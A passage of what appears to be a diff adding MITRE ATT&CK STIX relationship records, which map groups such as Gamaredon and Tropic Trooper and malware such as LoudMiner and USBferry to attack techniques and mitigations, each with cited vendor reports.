+ "target_ref": "attack-pattern--2e34237d-8574-43f6-aace-ae2915de8597",
+ "external_references": [
+ {
+ "source_name": "TrendMicro Gamaredon April 2020",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/gamaredon-apt-group-use-covid-19-lure-in-campaigns/",
+ "description": "Kakara, H., Maruyama, E. (2020, April 17). Gamaredon APT Group Use Covid-19 Lure in Campaigns. Retrieved May 19, 2020."
+ },
+ {
+ "source_name": "ESET Gamaredon June 2020",
+ "url": "https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/",
+ "description": "Boutin, J. (2020, June 11). Gamaredon group grows its game. Retrieved June 16, 2020."
+ }
+ ],
+ "description": "[Gamaredon Group](https://attack.mitre.org/groups/G0047) has delivered spearphishing emails with malicious attachments to targets.(Citation: TrendMicro Gamaredon April 2020)(Citation: ESET Gamaredon June 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--35624bc2-caf0-4124-88e8-6f60ae52ed9c",
+ "type": "relationship",
+ "modified": "2020-06-22T17:55:32.138Z",
+ "created": "2020-05-19T20:39:12.502Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--f99f3dcc-683f-4936-8791-075ac5e58f10",
+ "target_ref": "attack-pattern--365be77f-fc0e-42ee-bac8-4faf806d9336",
+ "external_references": [
+ {
+ "source_name": "ESET LoudMiner June 2019",
+ "url": "https://www.welivesecurity.com/2019/06/20/loudminer-mining-cracked-vst-software/",
+ "description": "Malik, M. (2019, June 20). LoudMiner: Cross-platform mining in cracked VST software. Retrieved May 18, 2020."
+ }
+ ],
+ "description": "[LoudMiner](https://attack.mitre.org/software/S0451) used an MSI installer to install the virtualization software.(Citation: ESET LoudMiner June 2019)\t",
+ "relationship_type": "uses",
+ "id": "relationship--e3540915-e2f8-4f99-8f81-57a566e9d115",
+ "type": "relationship",
+ "modified": "2020-06-23T00:48:35.422Z",
+ "created": "2020-05-19T21:26:54.333Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--f99f3dcc-683f-4936-8791-075ac5e58f10",
+ "target_ref": "attack-pattern--6747daa2-3533-4e78-8fb8-446ebb86448a",
+ "external_references": [
+ {
+ "source_name": "ESET LoudMiner June 2019",
+ "url": "https://www.welivesecurity.com/2019/06/20/loudminer-mining-cracked-vst-software/",
+ "description": "Malik, M. (2019, June 20). LoudMiner: Cross-platform mining in cracked VST software. Retrieved May 18, 2020."
+ }
+ ],
+ "description": "[LoudMiner](https://attack.mitre.org/software/S0451) used plists to execute shell scripts and maintain persistence on boot. [LoudMiner](https://attack.mitre.org/software/S0451) also added plist files in /Library/LaunchDaemons with KeepAlive set to true, which would restart the process if stopped.(Citation: ESET LoudMiner June 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--5fe00e0c-23f9-4520-936a-5c177a1cb44a",
+ "type": "relationship",
+ "modified": "2020-06-23T00:48:35.424Z",
+ "created": "2020-05-19T21:26:54.343Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--f99f3dcc-683f-4936-8791-075ac5e58f10",
+ "target_ref": "attack-pattern--d742a578-d70e-4d0e-96a6-02a9c30204e6",
+ "external_references": [
+ {
+ "source_name": "ESET LoudMiner June 2019",
+ "url": "https://www.welivesecurity.com/2019/06/20/loudminer-mining-cracked-vst-software/",
+ "description": "Malik, M. (2019, June 20). LoudMiner: Cross-platform mining in cracked VST software. Retrieved May 18, 2020."
+ }
+ ],
+ "description": "[LoudMiner](https://attack.mitre.org/software/S0451) is typically bundled with pirated copies of Virtual Studio Technology (VST) for Windows and macOS.(Citation: ESET LoudMiner June 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--870c08fa-6112-4d08-9b84-59df09f27b4d",
+ "type": "relationship",
+ "modified": "2020-06-23T00:48:35.425Z",
+ "created": "2020-05-19T21:26:54.399Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--76565741-3452-4069-ab08-80c0ea95bbeb",
+ "target_ref": "malware--cb741463-f0fe-42e0-8d45-bc7e8335f5ae",
+ "external_references": [
+ {
+ "description": "Unit42. (2016). SILVERTERRIER: THE RISE OF NIGERIAN BUSINESS EMAIL COMPROMISE. Retrieved November 13, 2018.",
+ "url": "https://www.paloaltonetworks.com/apps/pan/public/downloadResource?pagePath=/content/pan/en_US/resources/whitepapers/unit42-silverterrier-rise-of-nigerian-business-email-compromise",
+ "source_name": "Unit42 SilverTerrier 2018"
+ }
+ ],
+ "description": "(Citation: Unit42 SilverTerrier 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--e8948840-b0a0-4c10-87f4-022720dc8dd9",
+ "type": "relationship",
+ "modified": "2020-05-19T23:26:11.987Z",
+ "created": "2020-05-19T23:26:11.987Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "course-of-action--2995bc22-2851-4345-ad19-4e7e295be264",
+ "target_ref": "attack-pattern--e6415f09-df0e-48de-9aba-928c902b7549",
+ "description": "Limit the use of USB devices and removable media within a network.",
+ "relationship_type": "mitigates",
+ "id": "relationship--b957c285-b036-455d-a14f-8705838fd874",
+ "type": "relationship",
+ "modified": "2020-05-20T12:49:50.051Z",
+ "created": "2020-05-20T12:49:50.051Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "course-of-action--2995bc22-2851-4345-ad19-4e7e295be264",
+ "target_ref": "attack-pattern--a3e1e6c5-9c74-4fc0-a16c-a9d228c17829",
+ "description": "Limit the use of USB devices and removable media within a network.",
+ "relationship_type": "mitigates",
+ "id": "relationship--b2b112f8-27ed-449c-a9e1-e984139ee9f2",
+ "type": "relationship",
+ "modified": "2020-05-20T12:49:50.060Z",
+ "created": "2020-05-20T12:49:50.060Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "course-of-action--72dade3e-1cba-4182-b3b3-a77ca52f02a1",
+ "target_ref": "attack-pattern--f0589bc3-a6ae-425a-a3d5-5659bfee07f4",
+ "external_references": [
+ {
+ "url": "https://technet.microsoft.com/library/dn408187.aspx",
+ "description": "Microsoft. (2014, March 12). Configuring Additional LSA Protection. Retrieved November 27, 2017.",
+ "source_name": "Microsoft LSA Protection Mar 2014"
+ }
+ ],
+ "description": "On Windows 8.1 and Server 2012 R2, enable LSA Protection by setting the Registry key HKEY_LOCAL_MACHINE\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\RunAsPPL to dword:00000001. (Citation: Microsoft LSA Protection Mar 2014) LSA Protection ensures that LSA plug-ins and drivers are only loaded if they are digitally signed with a Microsoft signature and adhere to the Microsoft Security Development Lifecycle (SDL) process guidance. ",
+ "relationship_type": "mitigates",
+ "id": "relationship--26bc4aac-e7db-426f-af9f-b85fa60df277",
+ "type": "relationship",
+ "modified": "2020-05-20T13:13:48.991Z",
+ "created": "2020-05-20T13:13:48.991Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "course-of-action--2f316f6c-ae42-44fe-adf8-150989e0f6d3",
+ "target_ref": "attack-pattern--3489cfc5-640f-4bb3-a103-9137b97de79f",
+ "external_references": [
+ {
+ "source_name": "Windows Anonymous Enumeration of SAM Accounts",
+ "url": "https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/network-access-do-not-allow-anonymous-enumeration-of-sam-accounts-and-shares",
+ "description": "Microsoft. (2017, April 19). Network access: Do not allow anonymous enumeration of SAM accounts and shares. Retrieved May 20, 2020."
+ }
+ ],
+ "description": "Enable Windows Group Policy \u201cDo Not Allow Anonymous Enumeration of SAM Accounts and Shares\u201d security setting to limit users who can enumerate network shares.(Citation: Windows Anonymous Enumeration of SAM Accounts)",
+ "relationship_type": "mitigates",
+ "id": "relationship--af69bb4e-4cdb-4a9d-afff-5508c99c1276",
+ "type": "relationship",
+ "modified": "2020-05-20T13:33:50.879Z",
+ "created": "2020-05-20T13:33:50.879Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "course-of-action--1dcaeb21-9348-42ea-950a-f842aaf1ae1f",
+ "target_ref": "attack-pattern--4f9ca633-15c5-463c-9724-bdcd54fde541",
+ "description": "Consider disabling Windows administrative shares.",
+ "relationship_type": "mitigates",
+ "id": "relationship--afe166b7-d849-4635-8e85-65b9d0bf11c5",
+ "type": "relationship",
+ "modified": "2020-05-20T15:19:50.991Z",
+ "created": "2020-05-20T15:19:50.991Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--56319646-eb6e-41fc-ae53-aadfa7adb924",
+ "target_ref": "attack-pattern--232b7f21-adf9-4b42-b936-b9d6f7df856e",
+ "external_references": [
+ {
+ "source_name": "Anomali Pirate Panda April 2020",
+ "url": "https://www.anomali.com/blog/anomali-suspects-that-china-backed-apt-pirate-panda-may-be-seeking-access-to-vietnam-government-data-center#When:15:00:00Z",
+ "description": "Moore, S. et al. (2020, April 30). Anomali Suspects that China-Backed APT Pirate Panda May Be Seeking Access to Vietnam Government Data Center. Retrieved May 19, 2020."
+ }
+ ],
+ "description": "[Tropic Trooper](https://attack.mitre.org/groups/G0081) has lured victims into executing malware via malicious e-mail attachments.(Citation: Anomali Pirate Panda April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--283ba7b1-cd3b-44e9-bfae-70023c53d446",
+ "type": "relationship",
+ "modified": "2020-05-20T18:56:59.024Z",
+ "created": "2020-05-20T18:56:59.024Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--56319646-eb6e-41fc-ae53-aadfa7adb924",
+ "target_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161",
+ "external_references": [
+ {
+ "source_name": "Anomali Pirate Panda April 2020",
+ "url": "https://www.anomali.com/blog/anomali-suspects-that-china-backed-apt-pirate-panda-may-be-seeking-access-to-vietnam-government-data-center#When:15:00:00Z",
+ "description": "Moore, S. et al. (2020, April 30). Anomali Suspects that China-Backed APT Pirate Panda May Be Seeking Access to Vietnam Government Data Center. Retrieved May 19, 2020."
+ },
+ {
+ "source_name": "TrendMicro Tropic Trooper May 2020",
+ "url": "https://documents.trendmicro.com/assets/Tech-Brief-Tropic-Trooper-s-Back-USBferry-Attack-Targets-Air-gapped-Environments.pdf",
+ "description": "Chen, J.. (2020, May 12). Tropic Trooper\u2019s Back: USBferry Attack Targets Air gapped Environments. Retrieved May 20, 2020."
+ }
+ ],
+ "description": "[Tropic Trooper](https://attack.mitre.org/groups/G0081) has used HTTP in communication with the C2.(Citation: Anomali Pirate Panda April 2020)(Citation: TrendMicro Tropic Trooper May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--32bebd4b-6bbe-4a4e-86a1-0c49fda51259",
+ "type": "relationship",
+ "modified": "2020-05-21T16:39:27.634Z",
+ "created": "2020-05-20T19:05:37.549Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--56319646-eb6e-41fc-ae53-aadfa7adb924",
+ "target_ref": "attack-pattern--9efb1ea7-c37b-4595-9640-b7680cd84279",
+ "external_references": [
+ {
+ "source_name": "Anomali Pirate Panda April 2020",
+ "url": "https://www.anomali.com/blog/anomali-suspects-that-china-backed-apt-pirate-panda-may-be-seeking-access-to-vietnam-government-data-center#When:15:00:00Z",
+ "description": "Moore, S. et al. (2020, April 30). Anomali Suspects that China-Backed APT Pirate Panda May Be Seeking Access to Vietnam Government Data Center. Retrieved May 19, 2020."
+ },
+ {
+ "source_name": "TrendMicro Tropic Trooper May 2020",
+ "url": "https://documents.trendmicro.com/assets/Tech-Brief-Tropic-Trooper-s-Back-USBferry-Attack-Targets-Air-gapped-Environments.pdf",
+ "description": "Chen, J.. (2020, May 12). Tropic Trooper\u2019s Back: USBferry Attack Targets Air gapped Environments. Retrieved May 20, 2020."
+ }
+ ],
+ "description": "[Tropic Trooper](https://attack.mitre.org/groups/G0081) has created shortcuts in the Startup folder to establish persistence.(Citation: Anomali Pirate Panda April 2020)(Citation: TrendMicro Tropic Trooper May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--69cc4413-80b4-45ed-a993-db34fe32fabe",
+ "type": "relationship",
+ "modified": "2020-05-21T14:55:00.547Z",
+ "created": "2020-05-20T19:05:37.554Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--75bba379-4ba1-467e-8c60-ec2b269ee984",
+ "target_ref": "attack-pattern--045d0922-2310-4e60-b5e4-3302302cb3c5",
+ "external_references": [
+ {
+ "source_name": "TrendMicro Tropic Trooper May 2020",
+ "url": "https://documents.trendmicro.com/assets/Tech-Brief-Tropic-Trooper-s-Back-USBferry-Attack-Targets-Air-gapped-Environments.pdf",
+ "description": "Chen, J.. (2020, May 12). Tropic Trooper\u2019s Back: USBferry Attack Targets Air gapped Environments. Retrieved May 20, 2020."
+ }
+ ],
+ "description": "[USBferry](https://attack.mitre.org/software/S0452) can execute rundll32.exe in memory to avoid detection.(Citation: TrendMicro Tropic Trooper May 2020)\t",
+ "relationship_type": "uses",
+ "id": "relationship--95f2f687-4a70-4611-a420-2b8b53e2ee26",
+ "type": "relationship",
+ "modified": "2020-05-29T13:31:07.771Z",
+ "created": "2020-05-20T19:54:06.570Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--75bba379-4ba1-467e-8c60-ec2b269ee984",
+ "target_ref": "attack-pattern--3c4a2599-71ee-4405-ba1e-0e28414b4bc5",
+ "external_references": [
+ {
+ "source_name": "TrendMicro Tropic Trooper May 2020",
+ "url": "https://documents.trendmicro.com/assets/Tech-Brief-Tropic-Trooper-s-Back-USBferry-Attack-Targets-Air-gapped-Environments.pdf",
+ "description": "Chen, J.. (2020, May 12). Tropic Trooper\u2019s Back: USBferry Attack Targets Air gapped Environments. Retrieved May 20, 2020."
+ }
+ ],
+ "description": "[USBferry](https://attack.mitre.org/software/S0452) can collect information from an air-gapped host machine.(Citation: TrendMicro Tropic Trooper May 2020)\t",
+ "relationship_type": "uses",
+ "id": "relationship--b45e744d-f9c3-4469-a410-137f1802536f",
+ "type": "relationship",
+ "modified": "2020-05-29T13:31:07.773Z",
+ "created": "2020-05-20T19:54:06.589Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--75bba379-4ba1-467e-8c60-ec2b269ee984",
+ "target_ref": "attack-pattern--348f1eef-964b-4eb6-bb53-69b3dcb0c643",
+ "external_references": [
+ {
+ "source_name": "TrendMicro Tropic Trooper May 2020",
+ "url": "https://documents.trendmicro.com/assets/Tech-Brief-Tropic-Trooper-s-Back-USBferry-Attack-Targets-Air-gapped-Environments.pdf",
+ "description": "Chen, J.. (2020, May 12). Tropic Trooper\u2019s Back: USBferry Attack Targets Air gapped Environments. Retrieved May 20, 2020."
+ }
+ ],
+ "description": "[USBferry](https://attack.mitre.org/software/S0452) can check for connected USB devices.(Citation: TrendMicro Tropic Trooper May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--57e57dc4-b813-4e5c-882a-0021c7e0ff22",
+ "type": "relationship",
+ "modified": "2020-05-29T13:31:07.787Z",
+ "created": "2020-05-20T19:54:06.591Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--75bba379-4ba1-467e-8c60-ec2b269ee984",
+ "target_ref": "attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0",
+ "external_references": [
+ {
+ "source_name": "TrendMicro Tropic Trooper May 2020",
+ "url": "https://documents.trendmicro.com/assets/Tech-Brief-Tropic-Trooper-s-Back-USBferry-Attack-Targets-Air-gapped-Environments.pdf",
+ "description": "Chen, J.. (2020, May 12). Tropic Trooper\u2019s Back: USBferry Attack Targets Air gapped Environments. Retrieved May 20, 2020."
+ }
+ ],
+ "description": "[USBferry](https://attack.mitre.org/software/S0452) can detect the infected machine's network topology using ipconfig and arp.(Citation: TrendMicro Tropic Trooper May 2020)\t",
+ "relationship_type": "uses",
+ "id": "relationship--74ade1b3-d2d8-4537-87da-41f54346a149",
+ "type": "relationship",
+ "modified": "2020-05-29T13:31:07.831Z",
+ "created": "2020-05-20T19:54:06.596Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--75bba379-4ba1-467e-8c60-ec2b269ee984",
+ "target_ref": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18",
+ "external_references": [
+ {
+ "source_name": "TrendMicro Tropic Trooper May 2020",
+ "url": "https://documents.trendmicro.com/assets/Tech-Brief-Tropic-Trooper-s-Back-USBferry-Attack-Targets-Air-gapped-Environments.pdf",
+ "description": "Chen, J.. (2020, May 12). Tropic Trooper\u2019s Back: USBferry Attack Targets Air gapped Environments. Retrieved May 20, 2020."
+ }
+ ],
+ "description": "[USBferry](https://attack.mitre.org/software/S0452) can detect the victim's file or folder list.(Citation: TrendMicro Tropic Trooper May 2020)\t",
+ "relationship_type": "uses",
+ "id": "relationship--416c98b4-221d-4e2f-aed4-43b844a89ad0",
+ "type": "relationship",
+ "modified": "2020-05-29T13:31:07.840Z",
+ "created": "2020-05-20T19:54:06.598Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--75bba379-4ba1-467e-8c60-ec2b269ee984",
+ "target_ref": "attack-pattern--d1fcf083-a721-4223-aedf-bf8960798d62",
+ "external_references": [
+ {
+ "source_name": "TrendMicro Tropic Trooper May 2020",
+ "url": "https://documents.trendmicro.com/assets/Tech-Brief-Tropic-Trooper-s-Back-USBferry-Attack-Targets-Air-gapped-Environments.pdf",
+ "description": "Chen, J.. (2020, May 12). Tropic Trooper\u2019s Back: USBferry Attack Targets Air gapped Environments. Retrieved May 20, 2020."
+ }
+ ],
+ "description": "[USBferry](https://attack.mitre.org/software/S0452) can execute various Windows commands.(Citation: TrendMicro Tropic Trooper May 2020)\t",
+ "relationship_type": "uses",
+ "id": "relationship--8e1c15c8-ba96-47b8-9feb-fade45d7fcf9",
+ "type": "relationship",
+ "modified": "2020-05-29T13:31:07.848Z",
+ "created": "2020-05-20T19:54:06.600Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--75bba379-4ba1-467e-8c60-ec2b269ee984",
+ "target_ref": "attack-pattern--3b744087-9945-4a6f-91e8-9dbceda417a4",
+ "external_references": [
+ {
+ "source_name": "TrendMicro Tropic Trooper May 2020",
+ "url": "https://documents.trendmicro.com/assets/Tech-Brief-Tropic-Trooper-s-Back-USBferry-Attack-Targets-Air-gapped-Environments.pdf",
+ "description": "Chen, J.. (2020, May 12). Tropic Trooper\u2019s Back: USBferry Attack Targets Air gapped Environments. Retrieved May 20, 2020."
+ }
+ ],
+ "description": "[USBferry](https://attack.mitre.org/software/S0452) can copy its installer to attached USB storage devices.(Citation: TrendMicro Tropic Trooper May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--93bea600-6a8d-4f58-acf3-e7d604eeb451",
+ "type": "relationship",
+ "modified": "2020-05-29T13:31:07.893Z",
+ "created": "2020-05-20T19:54:06.621Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--269e8108-68c6-4f99-b911-14b2e765dec2",
+ "target_ref": "malware--73c4711b-407a-449d-b269-e3b1531fe7a9",
+ "external_references": [
+ {
+ "source_name": "TrendMicro POWERSTATS V3 June 2019",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/muddywater-resurfaces-uses-multi-stage-backdoor-powerstats-v3-and-new-post-exploitation-tools/",
+ "description": "Lunghi, D. and Horejsi, J.. (2019, June 10). MuddyWater Resurfaces, Uses Multi-Stage Backdoor POWERSTATS V3 and New Post-Exploitation Tools. Retrieved May 14, 2020."
+ }
+ ],
+ "description": "(Citation: TrendMicro POWERSTATS V3 June 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--b9decd90-60fa-4edc-b428-70e94d6d8207",
+ "type": "relationship",
+ "modified": "2020-05-20T20:39:29.132Z",
+ "created": "2020-05-20T20:39:29.132Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--56319646-eb6e-41fc-ae53-aadfa7adb924",
+ "target_ref": "attack-pattern--c2e147a9-d1a8-4074-811a-d8789202d916",
+ "external_references": [
+ {
+ "source_name": "TrendMicro Tropic Trooper May 2020",
+ "url": "https://documents.trendmicro.com/assets/Tech-Brief-Tropic-Trooper-s-Back-USBferry-Attack-Targets-Air-gapped-Environments.pdf",
+ "description": "Chen, J.. (2020, May 12). Tropic Trooper\u2019s Back: USBferry Attack Targets Air gapped Environments. Retrieved May 20, 2020."
+ }
+ ],
+ "description": "[Tropic Trooper](https://attack.mitre.org/groups/G0081) has used JPG files with encrypted payloads to mask their backdoor routines and evade detection.(Citation: TrendMicro Tropic Trooper May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--e35f5636-2ae8-4ab7-9851-73410e6a58d0",
+ "type": "relationship",
+ "modified": "2020-05-21T16:56:20.629Z",
+ "created": "2020-05-21T12:59:00.496Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--56319646-eb6e-41fc-ae53-aadfa7adb924",
+ "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add",
+ "external_references": [
+ {
+ "source_name": "TrendMicro Tropic Trooper May 2020",
+ "url": "https://documents.trendmicro.com/assets/Tech-Brief-Tropic-Trooper-s-Back-USBferry-Attack-Targets-Air-gapped-Environments.pdf",
+ "description": "Chen, J.. (2020, May 12). Tropic Trooper\u2019s Back: USBferry Attack Targets Air gapped Environments. Retrieved May 20, 2020."
+ }
+ ],
+ "description": "[Tropic Trooper](https://attack.mitre.org/groups/G0081) has used a delivered trojan to download additional files.(Citation: TrendMicro Tropic Trooper May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--0f47a6e7-af7e-4e23-a401-4dec08da4e64",
+ "type": "relationship",
+ "modified": "2020-05-21T16:39:27.637Z",
+ "created": "2020-05-21T12:59:00.513Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--56319646-eb6e-41fc-ae53-aadfa7adb924",
+ "target_ref": "attack-pattern--3b744087-9945-4a6f-91e8-9dbceda417a4",
+ "external_references": [
+ {
+ "source_name": "TrendMicro Tropic Trooper May 2020",
+ "url": "https://documents.trendmicro.com/assets/Tech-Brief-Tropic-Trooper-s-Back-USBferry-Attack-Targets-Air-gapped-Environments.pdf",
+ "description": "Chen, J.. (2020, May 12). Tropic Trooper\u2019s Back: USBferry Attack Targets Air gapped Environments. Retrieved May 20, 2020."
+ }
+ ],
+ "description": "[Tropic Trooper](https://attack.mitre.org/groups/G0081) has attempted to transfer [USBferry](https://attack.mitre.org/software/S0452) from an infected USB device by copying an Autorun function to the target machine.(Citation: TrendMicro Tropic Trooper May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--fded4f08-6cb0-4259-a6a9-f0d62537164f",
+ "type": "relationship",
+ "modified": "2020-05-21T16:56:20.633Z",
+ "created": "2020-05-21T12:59:00.515Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--56319646-eb6e-41fc-ae53-aadfa7adb924",
+ "target_ref": "malware--75bba379-4ba1-467e-8c60-ec2b269ee984",
+ "external_references": [
+ {
+ "source_name": "TrendMicro Tropic Trooper May 2020",
+ "url": "https://documents.trendmicro.com/assets/Tech-Brief-Tropic-Trooper-s-Back-USBferry-Attack-Targets-Air-gapped-Environments.pdf",
+ "description": "Chen, J.. (2020, May 12). Tropic Trooper\u2019s Back: USBferry Attack Targets Air gapped Environments. Retrieved May 20, 2020."
+ }
+ ],
+ "description": "(Citation: TrendMicro Tropic Trooper May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--1b5dbd72-abeb-4d61-9a7f-917a17f272d1",
+ "type": "relationship",
+ "modified": "2020-05-21T12:59:00.698Z",
+ "created": "2020-05-21T12:59:00.698Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--73c4711b-407a-449d-b269-e3b1531fe7a9",
+ "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "external_references": [
+ {
+ "source_name": "TrendMicro POWERSTATS V3 June 2019",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/muddywater-resurfaces-uses-multi-stage-backdoor-powerstats-v3-and-new-post-exploitation-tools/",
+ "description": "Lunghi, D. and Horejsi, J.. (2019, June 10). MuddyWater Resurfaces, Uses Multi-Stage Backdoor POWERSTATS V3 and New Post-Exploitation Tools. Retrieved May 14, 2020."
+ }
+ ],
+ "description": "[SHARPSTATS](https://attack.mitre.org/software/S0450) has used base64 encoding and XOR to obfuscate PowerShell scripts.(Citation: TrendMicro POWERSTATS V3 June 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--b5952b5f-281b-4ff4-9cfb-c2898f3028cc",
+ "type": "relationship",
+ "modified": "2020-05-21T13:12:36.932Z",
+ "created": "2020-05-21T13:12:36.932Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--56319646-eb6e-41fc-ae53-aadfa7adb924",
+ "target_ref": "attack-pattern--04fd5427-79c7-44ea-ae13-11b24778ff1c",
+ "external_references": [
+ {
+ "source_name": "TrendMicro Tropic Trooper May 2020",
+ "url": "https://documents.trendmicro.com/assets/Tech-Brief-Tropic-Trooper-s-Back-USBferry-Attack-Targets-Air-gapped-Environments.pdf",
+ "description": "Chen, J.. (2020, May 12). Tropic Trooper\u2019s Back: USBferry Attack Targets Air gapped Environments. Retrieved May 20, 2020."
+ }
